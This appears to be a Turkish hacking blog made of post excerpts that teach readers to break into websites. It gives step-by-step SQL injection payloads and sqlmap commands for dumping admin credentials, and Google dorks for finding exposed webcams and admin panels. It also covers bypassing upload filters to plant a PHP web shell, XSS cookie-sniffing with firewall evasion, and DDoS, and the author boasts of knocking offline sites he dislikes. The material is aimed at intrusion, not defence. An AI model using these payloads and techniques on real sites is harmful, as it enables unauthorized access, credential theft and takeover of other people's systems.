5-)Manuel Sql İnjection

Manuel Sql İnjection,sql injection,gelişmiş sql injection,manuel sql enjeksiyon,elle sql hack,hack,sql.



Arkadaşlar bu konuyu çok özenle hazırladım her kodu sizin için açıkladım bu yüzden full yazı yazdım işin mantığı için okuyun. Ve takıldığınız yeri yorumda sorun lütfen.

Arkadaşlar sql injection hack yapacaksanız eğer size sadece manuel sql öneririm çünkü programı yazan kişide bir insandır ve o programlarda bizim burada çalıştıracağımız kodları çalıştırıyor.

Ama o programları yazan kişiler sql hakkında baya bilgili kişiler olduğu için manuel sql size onların programından daha etkisiz gelebilir.Ama öyle değildir ileri düzey düşüneceğiz ve "ileri düzey sql injection" ile o programların çekemediği bilgileri çekeceğiz.

öncelikle sitemizde sql injection açığının olduğundan emin olmalıyız.

bkz. Elle(manuel) Sql Açığı Tespit Etme

site: hedefsite.com/index.php?id=1 

order by 1 diyoruz ve "1" i sırayla arttırıyoruz mesela diyelim order by 8 yaptık site normal açıldı ama order by 9 yapınca bozulduysa bu sitede 8 tane kolon vardır.

hedefsite.com/index.php?id=1 order by 1

ardından union select 1,2,3,4,5,6,7,8 --> 8 kolon olduğu için 8'e kadar.
böyle yapınca ekrana bakıyoruz herhangi bir sayı arıyoruz bu sitede 2 sayısı yansıdı o zaman sql komutlarını 2 sayısını silip orada çalıştırabiliriz.

hedefsite.com/index.php?id=1union select 1,2,3,4,5,6,7,8

union select 1,Database(),3,4,5,6,7,8 bu sitemizin database ismi :)

hedefsite.com/index.php?id=1 union select 1,Database(),3,4,5,6,7,8

union select 1,version(),3,4,5,6,7,8 buda sitenin versiyonu eğer 5 ve üstü ise bu kodları çalıştıracağız ama eğer 4 ise hiç ugrasmayın :)




union select 1,Group_concat(table_name),3,4,5,6,7,8 from information_schema.tables --> "information_schema" her sitede bulunur bizim db ye ulaşmamızı sağlar. bu kod ile tabloları istedik

hedefsite.com/index.php?id=1 union select 1,Group_concat(table_name),3,4,5,6,7,8 from information_schema.tables

union select 1,Group_concat(column_name),3,4,5,6,7,8 from information_schema.columns bu kod ile kolonları istedik

hedefsite.com/index.php?id=1 union select 1,Group_concat(column_name),3,4,5,6,7,8 from information_schema.columns

union select 1,kolon adı,3,4,5,6,7,8 from tablo adı admin bilgilerinin olduğu tablodan kolonları yansıtmasını istedik :) ve admin username ve password :)

Continue Reading...

4-)Online Web Kameralarının Tespiti

Online Web Kameralarının tespiti

Yanlış duymadınız :=) internette dolaşan bir çok kameraya bu exploit sayesiden ulaşabileceksiniz.



[intitle:’my webcamXP Server’]

kriterinin girilmesi yeterli oluyor

bunun nerden çıktığını merak ediyorsanız şuraya bakın

Exploit Nedir ve Google Gelişmiş Arama Tekniği

Continue Reading...

3-)Admin Panel Bulma Exploiti

Önce --> Exploit Nedir ve Google Gelişmiş Arama Tekniği


Arkadaşlar bu konuları okuyun yoksa anlamazsınız. Admin panel bulmada baska bilinmeyen bir yöntemi göstereceğim

mesela bi sitenin db bilgilerini çektiniz ama admin panelini bulamadınız o zaman bi de şu yöntemi deneyin


site:hedefsite.com/ inurl:admin


site:hedefsite.com/ inurl:login


burada kırmızı renk olan yere istediğinizi yazın size kalmış tutturursanız ulaşacaksınız panele.

Continue Reading...

2-)Google Gelişmiş Arama Tekniği

blog hayatım boyunca tek alıntı konum bu çünkü bende aynı şeyleri yazacaktım sizin için en iyiyi araştırıyorum.

Google’ın marifetlerini daha iyi anlayabileceğiniz arama tekniklerine göz atacağız.


filetype:

Dosya uzantılarına göre arama yapabileceğiniz bu komutla, arama kriterinizi içeren bilgilere ait dökümanlara ulaşabilirsiniz.

Örneğin [filetype: pdf ‘MacOS X’] yazdığınızda, MacOS X kelimesinin geçtiği 11.700 adet .pdf dosyasına ulaşabiliyoruz. Bulduğunuz belgeleri indirmeden önce ‘HTML olarak görüntüle’ linkine tıklayarak, içeriğine gözatabilirsiniz. Filetype operatörünün diğer alternatifi de ext: operatörüdür (extension) ve aynı mantıkla çalışır.


allintitle:

Bu komut, arama kriterinizde yer alan kelimelerin tamamının, internet tarayıcısının başlık çubuğunda yer almasını şart koşar. Örnek verecek olursak, [allintitle:’Flash Movies’] şeklindeki arama kriterinin sonucu olarak, web sayfasının title bilgisi üzerinde Flash Movies kelimeleri geçen sayfalar listelenecektir.


intitle:

‘allintitle’ komutundan farklı olarak, ilk arama kriterini başlık satırında arar, diğer kelimeleri ise metin içerisinde kontrol edilir.


allinurl:

Bu operatör, arama kriterine ait kelimeleri internet adres satırındaki (url) kelimeler içerisinde arar.
inurl:
İlk arama kriterini adres satırında arar.


cache:

Listelenen web sayfalarına ait sunuculara ulaşılamadığı durumlarda, cache operatörünü kullanarak, ilgili sayfaya Google’ın daha önce indekslediği bilgiler üzerinden ulaşabilirsiniz.


site:

Bu operatörü kullanarak, herhangi bir web sitesi içerisinde arama yapabilirsiniz. Örneğin [site:www.macline.com.tr Adobe] kriterini girdiğinizde, Macline web sitesi içerisinde ‘Adobe’ kelimesi geçen sayfalara ulaşabilirsiniz.


Link:

Bu komutu kullanarak herhangi bir web sitesine hangi sayfalardan link verildiğini öğrenebilirsiniz.
Bu operatörler tek başlarına kullanılabildiği gibi, birarada da kullanılabilmektedir. Örnek vermek gerekirse:

[intitle:Fiyat Listesi filetype: pdf]
[intitleVD Video filetype: pdf]
[intitle:mp3 ‘eye of the tiger’]
[site:edu intitle:science]

Continue Reading...

1-)Exploit Nedir Ne İşe Yarar

exploit:

Şöyle söyliyeyim bir ev düşünün bu evi sızmak istediğimiz hedef website olarak düşünün bu evin kapısının anahtarı sayesinde eve girebileceğiz. İşte bu anahtar exploit oluyor.:) Yani exploitler sayesiden hedef sistemlere sızabiliriz bu sistem site olur,bilgisayar olur ve saire yine kolaylaştırdım sizin için ;)

Continue Reading...

3-)Uniscan Kullanımı

Arkadaşlar ben anlatımı kali linuxdan yapıyorum sizin için uniscan'ın windowsa nasıl yüklendiğini atıyorum ama kullanımda bir farklılık yok.

öncelikle 

"uniscan help" komutunu verdiğimiz zaman bize nasıl taramalar yapacağımızı gösteriyor ben size bir sitenin güvenlik açıkları nasıl taranır onu göstereceğim, bunun dısında sitenin ip sini vererek, işte sitelerin ismini bir metin belgesine yazıp birden fazla site taratma seçenekleride var ama onlara gerek yok.

Bide siz benden farklı olarak programı uniscan.pl olarak çalıştıracaksınız ben .pl yazmıyorum


Arkadaşlar fotoğrafta -q , -w , -e , -d , -s harflerinin karşısında olanları isteyeceğiz programdan(perlden) ; bunları isteyince program sitenin dizindeki dosyalarını bulacak,güvenlik açıklarını tarayacak bizede bunlar lazım e mail bilgileri v.s. de çıkaraktır.

evet komut şu:

uniscan -u http://www.hedefsite.com/ -qweds

Takıldığınız her nokta için buradayım

İndirme Linkleri

Uniscan

Python Direkt İndir

Windows'a Uniscan Kurulumu

Continue Reading...

3-)Shell Nedir Ne İşe Yarar

Çok Basit.

Shell, hacklemek istediğimiz bir sitede bize admin yetkilerini veren php veya asp ile yazılmış bir tür scriptdir.

Bu dosyayı eğer hedef siteye yükleyebilirsek , upload edebilirsek shell aracılığıyla düzenlemeler yapabiliriz.

Upload Hack

Continue Reading...

1-)Güvenlik açığı nedir

Girişte bilmeniz gereken ilk konulardan birine değineceğim.

Güvenlik Açığı nedir?

Bir sistemi ele geçirmek veya hacklemek istyorsanız o sistemde öncelikle bir güvenlik açığı bulmak zorundasınız. Biz siteler üzerinde ilerleyeceğimiz için bizim bulmamız gereken şey website güvenlik açığıdır.Yönetici panelini bulduktan sonra bulmamız gereken şey web güvenlik açığıdır ;).

Web güvenlik açıkları sayesinde yönetici bilgilerini ele geçirip yöneticiye ait giriş paneli yani "admin paneli" nden o bilgilerle giriş yapıp site üzerinde sınırsız yetkiye sahip olabilirsiniz.

Başlıca Website Güvenlik Açıkları

Sql İnjection ve Çeşitleri <--- Çok önemlidir.

Dosya Upload

XSS

Brute Force

Ddos

Rfi-Lfi

CSRF

>>>> Web Güvenlik Açıklarını Nasıl Bulurum?

Continue Reading...

2-)Sql injection

Önce şu makalemi okumanız gerek ;) Elle(manuel) Sql Açığı Tespit Etme

sonrada şunu :) konuyu anlamanız için Veritabanı(Database) Nedir??
Arkadaşlar varya bu açık görüp görebileceniz hem çok hemde etkili bir numaralı açıktır.


Bu açık sayesinde

- Site içerisinde sql komutları çalıştırabileceksiniz.
- Veritabanından admin bilgilerini alabilirsiniz.(sql komutları sayesinde)
- Siteye Herhangi bir dosya çekebilirsiniz.
- Admin dışında site ilgili tüm bilgileri alabilirsiniz..(sql komutları sayesinde)

Bu açık ile bir siteyi hacklemek için 2 yol var.

1.Mevcut programlar 
2.Manuel(el ile)

El ile yaparsanız bilmeniz gereken sql komutları vardır ve en kesin sonuçları bu şekilde alırsınız çünkü önemli siteler programlar ile bypass(aşılması gereken engelleri aşmaya deniyor) edilemiyor.


1.Mevcut programlar 
A.Havij ile Sql İnjection
B. Sqlmap ile sql injection

Continue Reading...

4-)Ddos Nedir Ddos Saldırıları

Arkadaşlar ben blogumda hedef site hackı anlatmak istiyorum bu da hedef site hacktır ama bunu yapmak için birden çok bilgisayara yada "bot" a ihtiyacınız var bot bulamazsınız internette dolaşanlar ya virüsdür ya da işe yaramaz bende bi tane var gıcık aldığım siteleri anında kapatıyorum ama uzun süreli olmuyor uzun süreli olması için uzun süre saldırmam gerekiyor ama uğraşmıyorum biz ele geçirmeyi hedeflediğimiz için bu yöntemi gereksiz buluyorum.


Nedir

Arkadaşlar kendi bilgisayarınızdan hedef siteye bazı sorgular gönderiyorsunuz programlar aracılığıyla yada cmd üzerinden.Fakat bu işi yaparken sorguları hızlı bir şekilde gönderiyoruz sorgulara cevap gelmeden yeni bir sorgu gönderiyor programlar sitelerde cevap veremeyince bir süre sonra sunucu bu biriken sorguları kaldıramıyor ve nakavft :)

Continue Reading...

4-)Sqlmap ile sql injection

Sqlmap...

Bu python diliyle yazılmış olan aracı kullanarak Sql injection yaparken hem pro olarak hemde kolay bir şekilde sitelerin bilgilerini çekebileceksiniz.

Fakat bilmeniz gereken bazı sqlmap kodları vardır bunları ezberlemek kolaydır ben mantıklı anlatmaya çalışacağım bu yüzden kolay ezberleyeceksiniz.

1-sql injection yaparken önce database ismini bulacaksınız.

2-Admin bilgilerinin bulunduğu tablo ismini bulacaksınız

3-Admin bilgilerinin bulunduğu kolonu bulup 

Bilgileri isteyeceğiz.Sıralama Database>tablo>kolon.

İşte kodları yazarkende aynı bu şekilde isteyceğiz.Başlayalım.

Ben kali linux kullandığım için biraz farklı görünebilir ama kodlar aynıdır tek fark siz sqlmap.py yazarak çalıştıracaksınız komut yazarken.

sqlmap -u site --dbs (databaseismini istiyoruz)

sqlmap -u site -D dbismi --tables (bulduğumuz db ismini yazıp tabloyu istiyoruz)

sqlmap -u site -D dbismi -T tabloismi --columns (kolon)

sqlmap -u site -D dbismi -T tabloismi -C colonismi --dump (ve bilgiler)

örnek..)

Continue Reading...

6-)Dosya Upload Acigi Tamper Data

Bilmeniz gereken bir şey var öncelikle --> Shell Nedir


Arkadaşlar bazı siteler kendi sitelerine resim yüklenmesi veya başka nedenlerden dolayı dosya yükleme scriptleri kullanırlar.

Bizde buradan shell upload edersek,yüklersek shell sayesinde siteyi hackleyebiliriz.

Önlem olarak bu scriptlerle sadece jpeg,bmp,png uzantılı dosyaları kabul edecektir adminin yüklediği script o yüzden biz php uzantılı shellimizi yükleyemeceğiz :( diye düşünüyorsanız yanılırsınız. :)

 image/jpeg olarak değiştiriyoruz (\\\\r\\\\n yazan yerlere dokunmuyoruz sadece application/octet-stream yazan yer değişecek) 




Tamama tıklıyoruz ve Stop Tamper diyoruz.
Ve sonuç ;

Continue Reading...

1- Elle(manuel) Sql Açığı Tespit Etme

Arkadaşlar uzatmak istemiyorum her zamanki gibi...

Bakın hedef aldığınız siteye girip adreste http://www.hedefsite.com/php?id=1 gibi bir adres arayın

sayı ( 1 ) değişebilir"php" yazısı değişebilir farklı şeyler olabilir yani oralarda.

Böyle bir adres buldunuz. Sonra http://www.hedefsite.com/php?id=1' yapın yani sonuna bir tırnak atın ve siteye bakın her hangi bir değişim olmuşsa ve sql hatası verirse açık vardır.

Bazı arkadaslarım bana site atıyordu sitede sql hatası var, bana diyor ki bu sitede sql injection açığı var. Arkadaşlar bakın sitedeki herhangi bir hata sql açığı olduğunu göstermez eğer biz ' koyduktan sonra sql hatası veya sayfada herhangi  bir değişim oluyorsa açık mevcuttur. Eğer sitenin orjinali bozuksa bu sql injection olduğunu kanıtlamaz.

sql hatası dediğim şunun gibi

you have an error in your sql syntax

Continue Reading...

5-)Xss Açıklı Siteleri Hackleme Yöntemleri

Arkadaşlar burada size 2 yöntem göstereceğim.

1-Sniffer Hazırlama
2-Benim yöntemim

Not: Benim yöntemim tamamen bana ait değil ben sadece bu yöntemi bir abimden gördüm onunkini geliştirdim.

1-Sniffer Hazırlama

1-)tht deface teamdeyken bu videoyu hazırlamıştım
o yüzden o sitenin adını verdim saygı duyduğum bir sitedir.


youtube video-xss sniffer hazırlama



2-Benim yöntemim

Arkadaşlar manuel sql injecion yapanlar Bilirler bazı kodlarımızı güvenlik duvarı engellediği için bilgileri çekemeyebiliriz o zamanda o komutları hex leyip bypass ederiz.

Peki bunu neden XSS dede yapmayalım ki?



ama xss de hex çalışmaz çünkü html ile php birbirinden farklı xss html ile baglantılıdır sql ise asp yada php.Php için hex yapıyorsak html içinde "html encoder" kullanıcaz

Nasıl mı..



linux serverde yani php ile kodlanmış bir sitede xss açığı olsun bir html upload kodu örnek verelim

<form id="dosyayukle" action="upload.php" method="post" enctype=-<span class="i06t9mr20" id="i06t9mr20_8">multipart</span>/form-data">
<input type="file" name="dosya">
<input type="submit" value=-<span class="i06t9mr20" id="i06t9mr20_1">Ajax File Upload</span>->
</form>

<div id="progress">
<div id="bar"></div>
<div id="yuzde">0%</div >
</div>
<br/>

<div id="mesaj"></div>
</div>
<br/>

<div id="mesaj"></div>

bunu yazarsınız bazı sıtelerde bu kodlar  güvenlik duvarı tarafından yakalanır ve çalışmaz.bu kodu html encoderde çevirdik

&lt;form id=&quot;dosyayukle&quot; action=&quot;upload.php&quot; method=&quot;post&quot; enctype=-&lt;span class=&quot;i06t9mr20&quot; id=&quot;i06t9mr20_8&quot;&gt;multipart&lt;/span&gt;/form-data&quot;&gt;

&lt;input type=&quot;file&quot; name=&quot;dosya&quot;&gt;

&lt;input type=&quot;submit&quot; value=-&lt;span class=&quot;i06t9mr20&quot; id=&quot;i06t9mr20_1&quot;&gt;Ajax File Upload&lt;/span&gt;-&gt;

&lt;/form&gt;

&lt;div id=&quot;progress&quot;&gt;

&lt;div id=&quot;bar&quot;&gt;&lt;/div&gt;

&lt;div id=&quot;yuzde&quot;&gt;0%&lt;/div &gt;

&lt;/div&gt;

&lt;br/&gt;

&lt;div id=&quot;mesaj&quot;&gt;&lt;/div&gt;

&lt;/div&gt;

&lt;br/&gt;

&lt;div id=&quot;mesaj&quot;&gt;&lt;/div&gt;

bide bunu deneyin olacaktır kesin sonuç vermeyebilir ama bi köşede dursun sql de hexleyıınce ne kadar kesın sonuc alıyorsanız buda o kadar kesın.

Continue Reading...

4-)Xss Açıklı Siteleri Hackleme

Arkadaslar karısık gibi görünen bu açık aslında çok açık ve net.

bu açık ile site hacklemek emek ve zaman istiyor.Sitesinde xss açığı olan adminler kesinlikle önlem alıyorlar bu yüzden hacklemek zor oluyor.

Bu açık sayesinde : 

sitede html ve java script kodları çalıştırabiliyoruz.

XSS açığı genelde ziyaretçi defterlerinde bulunur. Biz ziyaretçi defterine <h1>CuLLeN_s</h1>(bu kod html de aradaki yazının büyük harfle sayfada yazılmasını sağlar)
yazdığımızda CuLLeN_s çıkıyorsa XSS açığı var.XSS search bölümlerinde ve site urllerinde de karşımıza çıkar buralara aynı şekilde bir html kod yazarsak ve çalışırsa açık var demektir.

örnek:



Açık Bulunan site nasıl hacklenir?

Arkadaşlar açık bulununca bir çok yöntem var ama ben bunu kendiniz bulun derim mesela düşünün html ile neler yapabilirim diye herkes bazı kodlar veriyor makalelerde yönlendirme kodu filan ama ben  bunları yiyen site görmedim tutan en sağlam yöntem sniffer hazırlamadır. Buyrun diğer makalelerimde bakalım neler yapabiliriz.

Continue Reading...

3-) Havij ile Sql İnjection

Arkadaşlar merhaba  sql injection bir çok şekilde mümkün şuan size 1. yolu göstereyim
bkz. sql injection

 

Tables diyoruz karşımıza database ismi çıkacak hiçbir şeye karışmadan Get Tables

Ardından yöneticiye ait veritabanındaki bilgiler çıkacak bunlara "tablo" diyoruz

 

şu gördüğünüz 4 ü tablo şimdide kolonları istiyoruz. isimler saçma ama napalım :)

 

evet yöneticiye ait şifre ve kullanıcı adı. Get Data verileri göster diyoruz.

 Haydi kolay gelsin bundan sonrası admin panelini bulup bu bilgilerle giriş yapmak.

CuLLeN_s den bu kadar

Continue Reading...

2-)Veritabanı(database) Nedir?

Arkadaslar öyle evirip çevirmenin bi anlamı yok biz bu sitede samimi,yalın bir dili amaçlıyoruz 

Veritabanı, bir siteye ait tüm bilgilerin bulunduğu yerdir adı üstünde veri tabanı :) verilerin saklandığı bölümdür ki biz hacker,defacerlerin girmemesi için adminlerin çabaladığı bir yerdir aynı zamanda..

Continue Reading...

2-)Web Güvenlik Açıklarını Nasıl Bulurum ?

Evet arkadaşlar web güvenlik açıklarından bahsetmiştim önce onu okumalısınız.

bkz. Güvenlik Açığı nedir?

Elinizde bir site var ve bu siteyi hacklemek istiyorsunuz ama ne yapmanız gerektiğini bilmiyorsunuz öyleyse sabırlı olun ve okumaya devam edin.

Uniscan

Bu program belirlediğiniz hedef siteye ait tüm web güvenlik açıklarını bulur."Eee bulsun sonra ne olacak?" diyeceksiniz. söyleyeyim :)

Siteye ait güvenlik açıklarının kullanımını öğreneceksiniz öğrendikten sonra site üzerinde deneyip siteyi hackleyeceksiniz bu kadar kolay ve basit. Tabi bazı siteler zorlar sizi açığı var diye tamam hackledim diyemezsiniz.

Web Güvenlik Açıklarının anlatımı yapılacaktır.

Continue Reading...

1-)Nasıl Hacker Olunur

Nasıl Hacker Olunur

Arkadaşlar bakın bu işlere insanların gözünde değer kazanmak,kendi reklamınızı yapmak,üç beş bilgi öğrenip insanları şaşırtmak için giriyorsanız baştan  kaybedersiniz çünkü "hack" misyon işidir yani birilerinin istediğini değil kendi istediğinizi yapacaksınız ki zevk alabilesiniz aksi takdirde;

Sıkılırsınız çünkü herkes bir makale yazıyor ve bu makaleleri okumak istek ve azim istiyor.

Zaman ister,hayatınızın bir bölümünü bu işe ayırmak zorundasınız.

Ve elbette önünüze taş koyacak insanlar çevrenizde olacaktır.

Bizi takipte kalın...

Continue Reading...